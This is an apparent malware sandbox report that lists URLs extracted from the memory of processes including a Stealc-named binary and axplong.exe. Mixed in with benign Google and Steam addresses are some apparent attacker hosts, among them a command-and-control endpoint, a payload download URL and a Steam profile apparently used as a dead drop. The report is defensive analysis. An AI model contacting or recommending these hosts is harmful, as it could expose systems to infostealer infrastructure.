Source: chrome.exe, 0000002B.00000002.2771182366.00002B3C00BE4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab_
Source: chrome.exe, 0000002B.00000002.2771182366.00002B3C00BE4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.ico
Source: stealc_default2.exe, 00000011.00000003.1992187439.0000000000DB3000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2178680224.0000000003E2D000.00000004.00000800.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2368715722.00000000057FC000.00000004.00000800.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2405275859.00000000057FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: svchost.exe, 00000023.00000003.2158177683.000002998D659000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
Source: svchost.exe, 00000023.00000003.2158177683.000002998D600000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
Source: chrome.exe, 0000002B.00000003.2259650975.0000229800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2259947837.000022980039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2703786753.000022980080C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
Source: chrome.exe, 0000002B.00000003.2259650975.0000229800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2259947837.000022980039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2703786753.000022980080C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
Source: chrome.exe, 0000002B.00000003.2265759074.00002298006E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2703524503.000022980078C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/
Source: chrome.exe, 0000002B.00000003.2259650975.0000229800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2259947837.000022980039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2703786753.000022980080C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/bJ
Source: chrome.exe, 0000002B.00000002.2704034525.00002B3C00064000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2758943906.00002B3C001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google.com/
Source: chrome.exe, 0000002B.00000002.2758943906.00002B3C001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google.com/googleapis.com
Source: new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/
Source: new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/en/
Source: 550b7cfe5f.exe, 0000002A.00000003.2541102427.0000000000F4F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e
Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2771549895.00002B3C00C3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/161903006
Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2771549895.00002B3C00C3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/166809097
Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2771549895.00002B3C00C3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/184850002
Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2771549895.00002B3C00C3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/187425444
Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2771549895.00002B3C00C3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/220069903
Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2771549895.00002B3C00C3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/229267970
Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2771549895.00002B3C00C3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/250706693
Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2771549895.00002B3C00C3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/253522366
Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2771549895.00002B3C00C3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/255411748
Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2771549895.00002B3C00C3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/258207403
Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2771549895.00002B3C00C3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/274859104
Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2771549895.00002B3C00C3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/284462263
Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2771182366.00002B3C00BE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/issues/166475273
Source: chrome.exe, 0000002B.00000002.2703455932.0000229800770000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2259947837.000022980039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2703786753.000022980080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2700906047.0000229800238000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2
Source: chrome.exe, 0000002B.00000002.2703455932.0000229800770000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2767972444.00002B3C009E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2700906047.0000229800238000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2/springboard
Source: chrome.exe, 0000002B.00000003.2259650975.0000229800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2259947837.000022980039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2703786753.000022980080C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2/springboard2
Source: chrome.exe, 0000002B.00000003.2259650975.0000229800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2259947837.000022980039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2703786753.000022980080C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2/springboardb
Source: chrome.exe, 0000002B.00000002.2703455932.0000229800770000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2/springboardhttps://labs.google.com/search/experiments
Source: chrome.exe, 0000002B.00000002.2703455932.0000229800770000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2259947837.000022980039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2703786753.000022980080C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiments
Source: chrome.exe, 0000002B.00000003.2265759074.00002298006E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2703422989.0000229800744000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2703524503.000022980078C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2269345057.00002298006EC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/upload
Source: chrome.exe, 0000002B.00000003.2259650975.0000229800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2259947837.000022980039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2703786753.000022980080C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/upload2
Source: new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.steampowered.com/
Source: new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lv.queniujq.cn
Source: chrome.exe, 0000002B.00000002.2758943906.00002B3C001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://m.google.com/devicemanagement/data/api
Source: new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://medal.tv
Source: chrome.exe, 0000002B.00000002.2760324094.00002B3C0045C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2763383332.00002B3C00734000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/?utm_source=ga-chrome-actions&utm_medium=manageGA
Source: chrome.exe, 0000002B.00000002.2764280996.00002B3C00830000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2760324094.00002B3C0045C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacy
Source: chrome.exe, 0000002B.00000002.2764280996.00002B3C00830000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2760324094.00002B3C0045C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhone
Source: chrome.exe, 0000002B.00000002.2764280996.00002B3C00830000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2760324094.00002B3C0045C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/signinoptions/password?utm_source=ga-chrome-actions&utm_medium=changePW
Source: 550b7cfe5f.exe, 0000002A.00000002.3474564441.0000000000F46000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.3443810612.0000000000F46000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2461071670.0000000000EE9000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2541102427.0000000000F4F000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.3443481489.0000000000EE0000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.3444015191.0000000000EE0000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000002.3474153244.0000000000EE0000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2398275478.0000000000F49000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2461039118.0000000000F4F000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2345731366.0000000000F49000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.3087852951.0000000000F4F000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2345680824.0000000000F4F000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2461647337.0000000000F51000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2512885460.0000000000F4F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://necklacedmny.store/
Source: 550b7cfe5f.exe, 0000002A.00000003.2592238207.0000000000F51000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://necklacedmny.store/F
Source: 550b7cfe5f.exe, 0000002A.00000002.3474564441.0000000000F46000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.3443810612.0000000000F46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://necklacedmny.store/N
Source: 550b7cfe5f.exe, 0000002A.00000002.3473998772.0000000000E8E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://necklacedmny.store/O
Source: 550b7cfe5f.exe, 0000002A.00000003.2512885460.0000000000F4F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://necklacedmny.store/api
Source: 550b7cfe5f.exe, 0000002A.00000003.2461039118.0000000000F4F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://necklacedmny.store/apiB
Source: 550b7cfe5f.exe, 0000002A.00000003.3109929770.0000000000F46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://necklacedmny.store/apiX
Source: 550b7cfe5f.exe, 0000002A.00000003.3109929770.0000000000F46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://necklacedmny.store/apip
Source: 550b7cfe5f.exe, 0000002A.00000003.2541102427.0000000000F4F000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2512885460.0000000000F4F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://necklacedmny.store/f
Source: 550b7cfe5f.exe, 0000002A.00000003.3443481489.0000000000EE0000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.3444015191.0000000000EE0000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000002.3474153244.0000000000EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://necklacedmny.store:443/api
Source: chrome.exe, 0000002B.00000002.2758943906.00002B3C001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oauthaccountmanager.googleapis.com/
Source: chrome.exe, 0000002B.00000002.2759036713.00002B3C0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oauthaccountmanager.googleapis.com/v1/issuetoken
Source: new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://player.vimeo.com
Source: new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net
Source: new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net/recapt
Source: new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://s.ytimg.com;
Source: chrome.exe, 0000002B.00000002.2704034525.00002B3C00064000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditing
Source: chrome.exe, 0000002B.00000002.2704034525.00002B3C00064000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sctauditing-pa.googleapis.com/v1/knownscts/length/$1/prefix/$2?key=AIzaSyBOti4mM-6x9WDnZIjIe
Source: chrome.exe, 0000002B.00000002.2758943906.00002B3C001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://securitydomain-pa.googleapis.com/v1/
Source: new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sketchfab.com
Source: axplong.exe, 0000000D.00000002.3764499174.0000000006190000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sosipisos.cc/
Source: axplong.exe, 0000000D.00000002.3764499174.0000000006190000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sosipisos.cc/shop.exeeK
Source: axplong.exe, 0000000D.00000002.3764499174.0000000006190000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sosipisos.cc/shop.exezKU
Source: new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steam.tv/
Source: new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast.akamaized.net
Source: new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B4E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/
Source: new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/discussions/
Source: new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B4E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
Source: new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/market/
Source: new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: new_v8.exe, 00000016.00000003.2159125127.0000000000B50000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B51000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B4E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
Source: new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
Source: new_v8.exe, 00000016.00000003.2159125127.0000000000B50000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B4E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
Source: new_v8.exe, 00000016.00000003.2159125127.0000000000B50000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B51000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B4E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900bf
Source: new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/workshop/
Source: new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowere
Source: new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowere&
Source: new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowereW
Source: new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/
Source: new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;
Source: new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/about/
Source: new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/explore/
Source: new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B4E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/legal/
